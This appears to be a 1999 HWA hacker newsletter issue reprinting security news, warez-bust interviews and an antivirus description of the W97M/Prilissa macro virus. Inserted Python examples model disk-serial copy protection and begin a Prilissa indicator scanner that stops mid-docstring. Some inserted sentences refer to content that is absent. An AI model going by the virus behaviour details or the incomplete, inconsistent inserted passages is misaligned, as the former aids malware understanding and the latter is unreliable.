Iomega, manufacturer of the popular Zip disk, has encoded every portable Zip, Jaz, and Clik disk with a unique serial number. The serial numbers are stored in a part of the disk that is inaccessible to end users, so the numbers cannot be modified. As part of a new cooperative alliance, Adobe is licensing code from Iomega that lets Adobe's Web Buy software extract the serial number from any Iomega disk, and use that number as a component of Adobe's encryption system. That makes Iomega's disks function as secure portable storage devices. The two technologies work together to emulate the way we use physical books today.
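The guarantee in the press release is that the serial cannot be modified, which is an integrity property; what a scheme like this needs for confidentiality is that the serial cannot be read, and the reader software has to read it to work at all. The Python below models that dependency. It is an added example, not Adobe's or Iomega's scheme (which the note above says was not examined): the key derivation, the stream cipher, the package layout and the serial strings are all assumptions made up for illustration.

```python
"""Model of media-locked encryption: the content key is derived from a disk
serial that the reading software retrieves, so whoever can retrieve the serial
can derive the key.  The construction is an assumption for illustration."""
import hashlib
import hmac
import os


def kdf(serial: bytes, salt: bytes) -> bytes:
    # Assumed KDF: HMAC-SHA256 keyed by the serial.  The only secret input is the serial.
    return hmac.new(serial, salt, hashlib.sha256).digest()


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Assumed cipher: SHA-256 in counter mode, enough to make the key dependency concrete.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def package_for_disk(plaintext: bytes, serial: bytes) -> dict:
    """Publisher side: lock content to one disk.  Everything returned is written to the disk."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = kdf(serial, salt)
    ct = xor(plaintext, keystream(key, nonce, len(plaintext)))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return {"salt": salt, "nonce": nonce, "ct": ct, "tag": tag}


def read_from_disk(pkg: dict, serial: bytes) -> bytes:
    """Reader side: rederive the key from the serial of the disk the package sits on."""
    key = kdf(serial, pkg["salt"])
    expected = hmac.new(key, pkg["nonce"] + pkg["ct"], hashlib.sha256).digest()
    if not hmac.compare_digest(expected, pkg["tag"]):
        raise ValueError("wrong disk: serial does not match the one the content was locked to")
    return xor(pkg["ct"], keystream(key, pkg["nonce"], len(pkg["ct"])))


def demo() -> dict:
    """Constructed serials (the real ones live in a disk area Iomega says users cannot reach)."""
    serial_a, serial_b = b"ZIP-SERIAL-0001-ASSUMED", b"ZIP-SERIAL-0002-ASSUMED"
    content = b"%PDF-1.3 ... the locked book ..."
    pkg = package_for_disk(content, serial_a)  # what the publisher writes onto disk A
    results = {"reads_on_its_own_disk": read_from_disk(pkg, serial_a) == content}
    try:  # the same files copied onto disk B: the derived key no longer matches
        read_from_disk(pkg, serial_b)
        results["reads_on_another_disk"] = True
    except ValueError:
        results["reads_on_another_disk"] = False
    # The reader must obtain serial_a to function, so any other program that calls the
    # same serial-retrieval routine holds the entire key and can do exactly what it does.
    serial_obtained_by_user = serial_a
    results["anyone_with_the_serial"] = read_from_disk(pkg, serial_obtained_by_user) == content
    return results
```

Whatever the real construction, any program that can invoke the same serial-retrieval routine as Web Buy holds every input the reader holds; locking of this kind stops casual disk-to-disk copying but offers no protection against the person who has the disk and the reader.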
"Instead of sharing your paperback or your document, you'll be able to share your disk, but only one person at a time will be able to read that 'book,'" says Germaine Ward, vice president of software solutions at Iomega Corporation.

@HWA

40.0 The 'Enemy' Speaks at Security Conference
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bluemiracle

The Computer Security Institute, as part of its symposium on information security earlier this week, hosted a "Meet the Enemy" session. Aleph 1, Mycroft, Maelstrom, and K0resh participated on the panel in front of over 200 administrators from government, the military, hardware and software manufacturers, financial services companies and e-commerce shops. (Enemy, what a derogatory term, thanks.)

APB News
http://www.apbnews.com/newscenter/internetcrime/1999/11/17/hackers1117_01.html

Hackers 'Meet the Enemy' in D.C.
Confront Computer Security Pros at Conference
Nov. 17, 1999
By James Gordon Meek

WASHINGTON (APBnews.com) -- Hackers say they are misunderstood by the public, but they love publicity. They say they are not dangerous, but warn computer users to put tighter computer security measures in place. They say they are not always interested in criminal activity such as theft, destruction or espionage. They hack out of intellectual curiosity and voyeurism.

In an unusual give and take staged at a Washington hotel last night, a dozen unrepentant hackers explained why they penetrate computer systems. It's for fun, for notoriety -- and for curiosity so insatiable that they risk federal criminal charges for unauthorized intrusions, they said.

200 experts listen in

Staged by the Computer Security Institute as part of its symposium on information security this week, the hackers beamed into the Marriott Hotel's ballroom on an audio conference call to be pitted against an audience of about 200 in what was billed a "Meet the Enemy" session.
Those seated in the large hall said they work for the government, the military, hardware and software manufacturers, financial services companies and e-commerce shops. One by one they questioned hackers identified only by their Internet "handles," pitting law enforcers against lawbreakers in a friendly discussion that organizers said was meant to elevate cyber-diplomacy.

The hackers appeared confident and cynical, demonstrating a consistent streak of black humor that kept attendees snickering all evening. The computer security experts seemed awed by the young snoops, regarding them almost as celebrities.

Defacing a site is afterthought

Early on, a questioner asked about the widely reported defacements of public Web sites, where peculiar slogans and images on sites operated by the FBI, Congress and other government institutions appeared to be politically motivated. A hacker who identified himself as Elias Levy said the defacements are often an afterthought to a successful intrusion meant to get publicity.

"It gives the media an excuse to make up more words like 'hacktivist,'" scoffed another.

Though characterized as "media devils," several said the press is considered indispensable to hackers who want their exploits online to be recognized by the public and the Internet "underground."

Aiming for publicity

A hacker called Microft answered a query about target selection by saying there are several considerations: "You're going to look at several things, such as access, connectivity or publicity -- media content." Defacements are typically signed by an intruder's identifying handle.

Most of the participating hackers said they had more than a decade of experience pinging computer networks, and several admitted they had more or less gone straight and now work as security consultants. British hacker Maelstrom said, "People get caught, people decide they don't want to get caught, or people grow up and just change."
"A lot of people get busted and go to jail, have their stuff taken and have to start over again," said another named K0resh. "I'm 29, and I don't want to start over again."

Tempted to join the dark side

But the reformed hackers are tempted regularly to join the dark side, and they still creep around the shadowy underbelly of the Internet. All claimed to have received solicitations -- often in person -- from foreign intelligence, federal agents and corporate operatives seeking competitors' information, such as design prototypes. The hackers said they are regularly offered thousands of dollars to make illegal intrusions.

"I get propositioned on a daily basis to hack things," Maelstrom said.

When approached, "I get this little 'Spidey Sense' thing that tells me this is trouble," said K0resh. "I don't think too much about it. I just tell them no, and go on my way."

Can break into almost anything

The basic assumption by the solicitors or undercover agents conducting sting operations is that skilled hackers can gain access to almost anything. And their assumption is correct, according to this bunch. One hacker said no system is "bulletproof," but computer networks can be reasonably fortified with firewalls and other measures.

An inquisitor asked: "Is there anything you can't break into?"

"Bananas," Microft joked. "And kiwis are very hard to peel."

Helping to debunk myths

Tuesday's hacking summit was organized by ponytailed security consultant Ray Kaplan, who said the 10th-annual meeting is designed to debunk the mythology about hackers as always engaged in criminal activity. "In my experience, the term 'hacker' is much maligned, abused, misused and otherwise misunderstood," he told APBnews.com. What motivated him to facilitate the Meet the Enemy conference each year is a desire to share knowledge and understanding. The hackers "like to help the so-called legitimate security community to understand the underground," he said.
Millennium bug feared

Participants on Tuesday repeatedly demanded to know if there was any truth to rumors that problems caused by the millennium bug might result in widespread computer attacks, intrusions or theft. When asked the greatest Y2K-related vulnerability to computers, hacker Maelstrom replied, "The greatest vulnerability is that people are paying too much attention to that [question], and not spending enough money on security."

Another tried to reassure the audience that hackers are not likely to raid computers worldwide after the potentially devastating date rollover. "Most hackers will be really drunk on New Year's Eve, so you'll all be pretty safe."

James Gordon Meek is an APBnews.com staff writer in Washington (james.meek@apbnews.com).

@HWA

41.0 Defense Fund Started for Warez4Cable + interviews.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by |DiSk|

The recent crackdown on Newnet by the Business Software Alliance has resulted in a civil lawsuit against 25 people and the seizure of their computers over alleged copyright violations. In response fellow Newnet patrons are organizing a fundraiser to help out the "#warez4cable" members. Anti-BSA.org also has interviews with some of the affected people.

Anti-BSA.org
http://www.anti-bsa.org/

SOFTWARE WATCHDOG ATTACKS CYBERPIRACY
BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in California and Michigan

Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel. In the past week, under the supervision of U.S.
Marshals, BSA carried out unannounced inspections of computer equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to $100,000 per copyrighted work infringed.

"Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger.

The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites and working closely with law enforcement to promote criminal prosecutions.

"This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to commit copyright infringement had better know that the law gives them no quarter," continued Kruger.

THIS JUST IN -- Activision rumored to have joined BSA

-=-

Interviews with key people in the #warezforcable bust:

Pandora;

First i'd like to say that there are certain questions about the specifics of my "activity" that I cannot answer. We are still in settlement negotiations and I'm really not supposed to be talking about the case. I'll answer what I can.

[data] Is it true that you were busted for distributing Pirated Software?
It's true that I'm being sued by the BSA for copyright infringement, yes.

[data] how did you find out that you were under investigation?

Hmm, I didn't until Nov 5th when three U.S. Marshals, two lawyers and two computer forensics pounded on my door at 7:30AM.

[data] did they explain how they caught you?

We were served with REAMS of legal documents that include a statement from the BSA Investigator explaining how he logged on to several fserves and downloaded software, etc. He states that W4C has been under surveillance since June.

[data] do you have the IPs that logged in logged? has any .bsa.org ip ever logged in?

I don't, but from the screenshots he enclosed you can see that he was using the nicks cdc4u and dawn.

[data] Im surprised pacbell released your personal info.

Well, under some bill that was passed a couple years ago the BSA was able to subpoena our ISPs for our information.

A little added information: During their raid on our home 3 computers and 2 CDs were seized. The computer forensics spent FOUR HOURS in our apartment trying to make directory listings of what was on each of the computers. On more than one occasion they needed the assistance of myself or Caine/Abel in doing so. A few days later our lawyer told us that the dir listings they'd made were somehow CORRUPT (read as: they didn't know what they were doing). A week and a half later we do not have our computers back and have yet to hear from them what exactly they want in this settlement. We have agreed to sign an Injunction that orders us not to download, distribute, use and so on, unlicensed software. We possibly won't get our computers back, and it's likely that they will ask for a monetary settlement. Scarily, the law allows them to fine us $100,000 PER piece of software should we be convicted of copyright infringement. At this point in time we've already spent over $1000 on lawyer fees alone.

I also want to send out a big THANKS to all who have supported us through this.
To all the old friends who have called or contacted us, and to all those out there wishing us the best... we appreciate you more than you know. Thank you.

If you have any other questions, please ask. I want it to be clear to all what is really happening since there seems to be a lot of speculation and rumor going around.

BY THE WAY!! Some pertinent info you might want to know. For DAYS I couldn't stop asking "Why us?? Why me??" As you're well aware there are bigger channels and groups out there than W4C, it didn't make any sense that the BSA was targeting us. Well, do you remember a guy named SirSlappy? General trouble maker on NewNet?? Apparently he reported myself and Caine to the BSA, which started this huge disaster. I hope he's on everyone's blacklist.

-=-

Etamitlu, founder of #warezforcable

[data] Hello
[Etamitlu] hey, sup?
[data] is it true you were a #warez4cable cofounder?
[Etamitlu] yes, i was a cofounder along with a few others
[data] What did you notice strange in the channel before the incident?
[Etamitlu] well, we never really noticed anything *strange*
[Etamitlu] but, Appz350 did come in and say that "Microsoft busted him" a couple weeks before it happened
[Etamitlu] we didn't believe him because Microsoft obviously can't arrest him
[Etamitlu] but maybe there was some truth to that
[data] Maybe
[Etamitlu] that's all that i can think of that was strange before it happened
[data] Why do you think what the BSA did was wrong?
[Etamitlu] it was wrong in my opinion because catching 25 of us won't do anything.. i mean we're the small guys
[Etamitlu] if they really want to put a stop to piracy they need to go after the release groups
[Etamitlu] also, we were on newnet
[Etamitlu] there are something like 4000 people on newnet
[data] Do you know where to go after the release groups?
I imagine it would be hard
[Etamitlu] they could have made a MUCH larger impact if they had gone after dalnet with nearly 10 times as many people
[Etamitlu] well yeah, it would be fairly hard.. but paradigm was busted once if im not mistaken
[data] who closed the channel? When? and Why?
[Etamitlu] who closed #warez4cable?
[Etamitlu] well
[Etamitlu] we were supposed to have an op meeting last Thursday night
[Etamitlu] all day that day people were flooding with messages like "THE FBI IS HERE! LEAVE NOW!!!"
[Etamitlu] so it was obvious that we were dead because everyone was leaving
[Etamitlu] and all of our ops were puzzled, leaving, and asking questions
[Etamitlu] so we had a founder/cofounder meeting and decided to shutdown the channel
[Etamitlu] we just set it +im and banned everyone
[data] Were any founders/cofounders busted?
[Etamitlu] no, they were not
[Etamitlu] surprisingly, they were not
[Etamitlu] however
[Etamitlu] Caine and Pand0ra had been high ranking w4c members in the past
[Etamitlu] and they were the first caught
[data] Yes and their houses were raided.. the interview is at www.anti-bsa.org/interview2.html
[Etamitlu] other than that, no founders/cofounders were caught
[data] I'm sure the BSA will be in the chan, is there any message you would like to leave them?
[Etamitlu] i'd just like to let them know that they made a big mistake here and that this won't even help to stop a fraction of piracy

-=-

|{rypto

[data] Hello
[data] Is it true you are being served for serving warez in #warez4cable?
[|{rypto] Yeaps
[data] How/when did you find out?
[|{rypto] umm, November 12, 1999
[data] and how?
[|{rypto] by Fedex
[data] How did they say they caught you?
[|{rypto] They went into my fserve w4c-krypto and saw what i had and got 4 counts on me
[data] I see
[data] what did they tell you the punishment will be?
[|{rypto] a bunch of shit...promise to never do it again, they want the PC, and money
[data] IF they had warned you... would you have stopped?
[|{rypto] Hell YEAH
[data] how old are you?
[|{rypto] 18
[data] As you know, many channels have closed because of these law suits. If the bsa had gone after one of the groups, or only one or two of the servers as opposed to 25, would people have been as worried?
[|{rypto] Yeah i think so because people would have looked up BSA and seen what they do
[data] Were you aware that this could happen when you joined #warez4cable?
[|{rypto] I wasn't really aware of the consequences
[data] Must have been horrible for you
[|{rypto] yeah it is but luckily i have the smallest case of them all
[data] do you have any idea the IPs or the nicks of the 'BSA spies'?
[|{rypto] yeah dawn,cdc4u
[data] you have their IPs?
[data] or, isps
[|{rypto] no sorry
[data] okay
[data] any last message to any BSA members and the internet surfing public?
[|{rypto] Yeah stop we're just having fun
[data] Thanks a lot
[data] good luck on the case
[|{rypto] thanx

-=-

SirSlappy

Session Start: Tue Nov 16 22:15:43 1999
* Logging SirSlappy to 'SirSlappy_19991116.log'
[sh0rt] can i speak to you, on the record?
[SirSlappy] sure
[sh0rt] what do you have to say about pand0ra accusing you of blowing the whistle...ratting on w4c to the bsa
[sh0rt] ?
[SirSlappy] well.
[SirSlappy] you ready to quote me on this shit?
[sh0rt] yes
[SirSlappy] I think it's hilarious
[SirSlappy] and don't ask any questions for a while
[sh0rt] is it true?
[SirSlappy] because..
[SirSlappy] I'm going to be typing some shit
[sh0rt] okay
[sh0rt] type away
[SirSlappy] and you can put it on the web page for all the pricks that fuckin /msg me every fuckin day trying to start shit
[sh0rt] go ahead
[SirSlappy] to the bitches out there that want some of the Slapper... Come get some.. No one can fuck with me or my l33t Vhosts
[SirSlappy] now.. to the business
[SirSlappy] 1st of all. No!, I did not report anyone to the BSA.
I had no desire for anyone on IRC to get in trouble
[SirSlappy] yes, I take over channels and hack shit and do lame shit..whatever. but that is on the internet.. That isn't in real life
[SirSlappy] I would NEVER report anyone on IRC. Maybe from AOL. (maybe).
[SirSlappy] but.. I would NEVER report ANYONE Anyway...
[sh0rt] what would you like to say to pand0ra?
[SirSlappy] I have no desire to.
[SirSlappy] I would like to tell her..
[SirSlappy] um..
[SirSlappy] how the hell did you come up with my name? There is no log of me being in that channel
[SirSlappy] I never had anything against W4c
[sh0rt] why do you think pand0ra believes you were the one who ratted on w4c?
[SirSlappy] well. I take that back.
[SirSlappy] I did.. about a fuckin year ago. and that's another story in itself
[SirSlappy] I think it's because I took over the #W4c channel
[SirSlappy] like.. 8 months ago
[SirSlappy] or something
[SirSlappy] that's the only reason I can think of that she would say I did it
[sh0rt] do you agree with what the bsa is doing?
[SirSlappy] well...
[SirSlappy] I think that the software companies bring warez upon themselves
[SirSlappy] I am for warez.. at least until the software companies make software a better deal
[SirSlappy] like.
[SirSlappy] if you want to buy software.. It's like 50 bucks for a shitty program
[SirSlappy] and once you buy it.. there's no taking it back
[SirSlappy] that sucks a dick
[SirSlappy] you can't resell it
[SirSlappy] you can't do shit with it.. it's yours..forever.
[sh0rt] do you serve warez? have you ever served warez?
[SirSlappy] I plead the 5th on that question
[sh0rt] understandable.
[sh0rt] thanks for your time.
[SirSlappy] I'm here to help
[SirSlappy] :)
[sh0rt] any final words?
[SirSlappy] yes.
[sh0rt] shoot
[SirSlappy] to all of you lamers who feel you need to /msg me on IRC telling me that I'm a snitch.. etc etc.. why don't you save that shit.
I'm sick of hearing it
[SirSlappy] not done
[SirSlappy] do you really think the BSA is gonna come crashing in someone's door because 1 person called them up?
[SirSlappy] do you think they just said.. "shit!! there's warez on IRC .. SirSlappy said so!! let's go get em!"
[SirSlappy] I doubt it
[SirSlappy] that's all
[SirSlappy] thanks for the interview
[sh0rt] alright.
[SirSlappy] :)
[sh0rt] peace
[SirSlappy] yep
Session Close: Tue Nov 16 22:28:24 1999

@HWA

42.0 Menwith Hill To Get Upgrade Monies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by seventh

The fiscal 2000 Intelligence Authorization Act contains language that would indicate that an undisclosed amount of funds have been earmarked for upgrades to the Menwith Hill signals intelligence listening post in England. Menwith Hill is widely suspected of being one of the central European-based listening posts for the Echelon system, a global surveillance network sponsored by the NSA.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html

NOVEMBER 18, 1999 . . . 11:59 EST

Intelligence bill targets NSA, Echelon upgrades

BY DANIEL VERTON (dan_verton@fcw.com)

A bill that would authorize appropriations for the fiscal 2000 operations of the U.S. intelligence community includes funding for infrastructure upgrades at a key facility in what many suspect is a global, electronic surveillance network. According to language in a joint report on the fiscal 2000 Intelligence Authorization Act, an undisclosed amount of funds have been earmarked for upgrades to the Menwith Hill signals intelligence listening post in England. The top-secret facility is widely suspected of being one of the central European-based processing centers for the "Echelon" system, an electronic surveillance network sponsored by the National Security Agency.
The Cold War-vintage global spy system consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. Known as Echelon, the system came under attack last year after the Scientific and Technological Options Committee of the European Parliament pledged a full-scale investigation into suspected NSA privacy abuses ["European Union may investigate U.S. global spy computer network", fcw.com, Nov. 17, 1998].

Commenting on the floor of the House, Rep. Porter Goss (R-Fla.) praised the House/Senate conference report, which was agreed to Nov. 9, for its insistence that NSA be made to account for its methods of intercepting electronic communications. "We direct...the NSA to report in detail on the legal standards that it employs for the interception of communications," Goss said.

Rep. Sanford Bishop Jr. (D-Ga.) said that although NSA is facing "tremendous challenges coping with the explosive development of commercial communications and computer technology...[the agency] has not demonstrated much prowess in coping with the challenge." According to Bishop, a "sustained funding increase" may be necessary to fix NSA's dwindling eavesdropping capabilities. "Action is...imperative since the nation cannot navigate with an impaired sense of hearing," he said.

@HWA

43.0 CSIS Lost Classified Floppy Disk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I love this, it sure inspires confidence in our esteemed CSIS operatives, talk about a bunch of fuckups! - Ed

From HNN http://www.hackernews.com/

contributed by William Knowles

The Canadian Security Intelligence Service lost a floppy disk containing classified information. The disk was found in a phone booth in 1996 in downtown Toronto.
Recently it has been learned that the disk contained information in plain text about confidential informants and contacts, information about covert operations and details about training exercises. (Remember you're only as secure as your weakest link, or your stupidest employee.)

Globe and Mail
http://www.globeandmail.com/gam/National/19991118/USPYSN.html

The spy secrets in the phone booth
Shedding light on another CSIS slip-up, man describes stumbling over 'sensitive' material

ANDREW MITROVICA and JEFF SALLOT
The Globe and Mail
Thursday, November 18, 1999

Toronto and Ottawa -- ANDREW MITROVICA in Toronto, JEFF SALLOT in Ottawa

A Toronto man who found a Canadian Security Intelligence Service computer diskette in a telephone booth says it detailed -- in plain English -- the names of confidential informants and contacts, information about the service's targets and covert operations in Canada and details about espionage training exercises. "The more I looked, the more I realized that this was very, very, sensitive stuff," the man told The Globe and Mail yesterday in his first interview about the diskette mishap, which took place in 1996. "This is amazing, I thought." Federal government sources confirmed many details of the man's account. The sources said the diskette was lost by a CSIS intelligence officer who was moving from headquarters in Ottawa to a new position in Toronto. Although its loss was reported in the media at the time, the man's comments provide the first details of the information the diskette contained. The new revelations are likely to become the latest embarrassment for Canada's embattled spy agency, which has already been rocked by news that top-secret documents were in a briefcase stolen from an agent's minivan in Toronto last month. The man who found the diskette in 1996 admitted he considered selling it to the "highest bidder" before returning it to the agency.
"People were named; contacts that they [CSIS] had within organizations in Bosnia and in Canada, people that were in training, covert operations," he said. "They were talking about largely unofficial, undercover contacts and people that they were observing," he said. He eventually returned the diskette to CSIS because he thought it was his duty, he said. But the episode "shattered my illusions about what a secret service operates like. I was doing what I felt was the responsible thing to do." The incident was later investigated by the Security Intelligence Review Committee, an independent watchdog panel. The committee was satisfied that the classified material hadn't fallen into the hands of anyone who could have used it to harm national security. Nevertheless, the case caused changes in CSIS's internal procedures for transferring sensitive data from one location to another, the federal sources said. The finder of the diskette, who asked not to be identified for fear of reprisal, recounted his brief foray into the shadowy world of espionage. It began in early August, 1996, when he stopped to make a phone call at the busy Toronto intersection of Yonge Street and Lawrence Avenue. "I went into one of the phone booths to make a call and there was a diskette on the shelf. It was just the diskette; there was nothing else. It had obviously fallen out of something because there were quite substantial scratch marks on it," he recalled. He looked around for the owner. The library near the phone booth was closed, so he posted a note on the doors, saying: "Disk found, please call . . ." He went home and waited for a reply. Curious, he shoved the unmarked diskette into his computer. "I thought, 'Maybe there is something in here that identifies who this belongs to,' " the man said. He opened the document using his computer's word-processing software and was shocked by what popped up on his screen. "It came up without any conversion. 
It just opened right up; it wasn't password protected and [as] I started scanning through this stuff there was a large quantity of clearly sensitive information. Quite frankly, I thought at first it was just an elaborate practical joke. It was a whole bunch of cloak-and-dagger stuff." He kept reading the uncoded documents. There were between eight and 12 in total, each about four pages in length. He only read three or four documents, he said. He said he considered selling the diskette to one of CSIS's targets, who was identified in the documents. "I briefly toyed with the possibility of seeing who would buy this for the highest bid. I do know there were names there, and I thought, 'Hey, what if I give this person a call and say: Do you know what CSIS has on you?' I abandoned the idea. I figured I could get myself in a lot of trouble that way." He tried to make a copy of the diskette but realized that the information had not been transferred. In mid-August, he picked up the phone and called CSIS in Toronto. "I didn't know who CSIS was. So I just looked them up in the phone book and I called them up." He described his find to a CSIS officer. A few hours later, H. N. (Harry) Southern, the agency's head of internal security, arrived at the man's home office in downtown Toronto. The following day, CSIS called back and said they wanted to pay him another visit. This time, two agents dropped by: Angela Jones and Mr. Southern. They began to question him about "everything I knew about this," he said. CSIS knew that he had told friends about his diskette adventure. "They asked me: 'Did you make any copies of it?' and I said that I didn't make any printouts but I had made a copy of the diskette, but when I tried to open it, I couldn't read it. They took my word on it and never asked me for the copy," the man recalled. The agents asked him not to tell anyone about the lost diskette. "They were extremely uncomfortable. They were very ill at ease, very embarrassed. 
It's an organization that's supposed to be top secret. And I think it was uncomfortable for them to go to a Joe on the street like me and ask him how he managed to just find in a phone booth these kind of documents," he said. The pair of agents paid him a third visit after they learned that he knew a journalist who worked in Toronto for The Christian Science Monitor newspaper. The same agents later paid a visit to the journalist and his wife and peppered them with questions about what they knew about what was on the diskette. He said the agents told him they were getting a lot of heat from their spymasters, who were anxious that his find not hit the front pages of newspapers in Canada. The man, who works as an administrator in Toronto, asked the CSIS agents for money in return for his silence. They refused. He had some harsh words for the agency. "I told them if things are as unprofessional as they seem, maybe it would good if a little heat was put under some people. They said: 'Believe me, there is some heat being put under some people,' " he said. He was not threatened. "They were very meek," he said. Former CSIS officer Peter Marwitz said the case of the missing diskette is known widely within the service and is a sore point for many veteran officers who think carelessness on this scale should have been a firing offence. The veterans, Mr. Marwitz said recently, believe the careless officer in the 1996 incident went unpunished because "she brazenly defied her challenger, reminding the service that she was a woman and a minority." The SIRC, the watchdog committee that reports to Parliament, made an oblique reference to the 1996 incident in one of its published audits. Procedures were changed after the incident so that an officer moving from headquarters to a regional office isn't required to carry data physically on computer diskettes, federal sources said. 
Officers can now transfer their computer network data accounts to the new location and sign on to the network and get access to any of the files they are authorized to see, the sources said. CSIS spokesman Dan Lambert said the service will neither confirm nor deny details of the lost-diskette episode. He said an internal investigation is still under way in the case of the employee who lost the operational planning document while at the hockey game. Meanwhile, Solicitor-General Lawrence MacAulay, the federal minister responsible for both CSIS and the RCMP, confirmed that the Mounties lost a briefcase containing sensitive documents in British Columbia in 1995. But he said RCMP Commissioner Philip Murray assured him that the loss did not pose a threat to national security. Opposition parties blasted Mr. MacAulay for the third day running yesterday for his failure to immediately notify the SIRC, the review committee, upon learning of the incident at the hockey game. "People . . . need to know that these departments are not leaking like sieves," Reform MP Jim Abbott said.

@HWA

44.0 Hitachi Chip May Prevent Use of Third-party Printer Cartridges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

New technology being developed by Hitachi may prevent people from using third party printer cartridges. By embedding chips similar to those in hotel keys or smart cards into toner or ink cartridges Hitachi could prevent customers from using third-party cartridges. Hitachi is planning on incorporating this technology into laser printers and copiers it markets in Japan and is currently in negotiations with several US companies to license the technology.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13897,00.html

Smart Cards May Secure Peripherals
Hitachi previews chips that could ID pirated music or third-party printer cartridges.

by Martyn Williams, IDG News Service
November 18, 1999, 1:30 p.m.
PT LAS VEGAS -- Hitachi Maxell is previewing at Comdex here a prototype chip being eyed by laser printer and copier makers as a way to stop customers from using third-party toner cartridges. The new chip is a development of proximity smart cards already on the market. Smart cards are widely used in applications like hotel door keys and telephone cards, and can exchange data when brought within a few millimeters of a reader. At just 2.3 mm square, the chips greatly cut down on the space needed for the devices that use them. The chip supports a 32-bit key and may also find its way into an antipiracy device to protect CD- or DVD-based media. If a disk lacked the chip, the player would refuse to accept it. Hitachi already plans to build card readers into the laser printers and copiers it markets in Japan. With the chips embedded into toner cartridges, printers can reject cartridges that don't carry the chip. This could kill the third-party toner business in Japan, but it's not clear whether U.S. law would permit the same tactic, says Masaaki Chino, manager of Hitachi Maxell's smart card projects. "If they include this reader board into the copy machine and this chip into the cartridge, they can control which cartridges are used," Chino says. Nevertheless, Hitachi is already talking to several major U.S. vendors regarding the technology, although Chino declined to name them. Hitachi supplies laser printer and copier engines to NEC, Brother, and Minolta. At Comdex, Hitachi is also showing an application in which the chips are loaded with a URL and embedded into vendors' promotional material. When the brochures are near a dedicated reader for personal computers, the company's Web site appears inside the browser running on the PC. The current implementation, which requires a stand-alone reader, is a little clunky, Chino acknowledges. But Hitachi is talking with several PC vendors, including Sharp, about building the readers into computers. 
@HWA

45.0 NEW MACRO VIRUS OUT THERE
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Saturday 20th November 1999 on 2:13 pm CET

Anti-virus researchers at Network Associates Inc. said Friday that 10 Fortune 500 companies on three continents have been hit with a new virus called W97M/Prilissa. Prilissa is a nasty variant on two better known attacks -- the Melissa worm and the PRI virus. It infects Word 97 documents wherever Word 97 runs; its disk-wiping payload, described below, only works on Windows 95 and 98 because it relies on AUTOEXEC.BAT.

Link: NAI http://vil.nai.com/vil/vm10441.asp

Virus Name: W97M/Prilissa
Date Added: 11/17/99

Virus Characteristics

This is a virus for Word 97 documents. It is able to replicate under the SR-1 release of Word 97. It will turn off the macro warning feature of Word 97. This virus uses the "ThisDocument" stream, or class module, of a document or template during infection routine. It is a copy-cat of the W97M/Melissa.a virus and there is a payload to send the infected file via MS Outlook. Another payload exists for this virus which is date activated - December 25th - to reformat the hard drive (on Windows 9x systems) and also overlay the active document with random shapes. Due to this overlay activation which is a copied technique of the W97M/Pri virus, the name is a combination of W97M/Melissa and W97M/Pri, hence W97M/Prilissa.

This virus hooks the system event of opening documents in Word97 by the subroutine "Document_Open" thereby running its code. Another system event hooked is the closing of documents due to the subroutine "Document_Close" in the global template after infection.

This virus checks for the existence of a registry key, a self-check to verify if the local system has already been infected. The key is:

    HKEY_CURRENT_USER\Software\Microsoft\Office\
    "CyberNET"="(C)1999 - Indonesia by AnomOke!"
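The NAI description gives three things an admin can actually look for on a box: the HKCU "CyberNET" marker the virus writes once it has mailed itself out, the lines its December 25th payload drops into C:\AUTOEXEC.BAT (quoted in full in the description that follows), and the Document_Open/Document_Close hooks plus Outlook automation in the document's macro code. The Python below is an added example written for this issue, not NAI's detection logic and containing nothing from the virus itself: it checks all three against sample input. The registry values are passed in as a dict (as you would get from parsing a .reg export), the VBA and AUTOEXEC.BAT samples are constructed for the test run, and the match on Options.VirusProtection is an assumption about how the macro warning gets switched off, since the description only says that it is.

```python
"""Indicator scan for the W97M/Prilissa traits in the NAI write-up.

Added example for this issue; it is not NAI's detection code and contains
nothing from the virus itself. The registry marker, the AUTOEXEC.BAT lines
and the Word/Outlook behaviour are taken from the write-up; the two VBA
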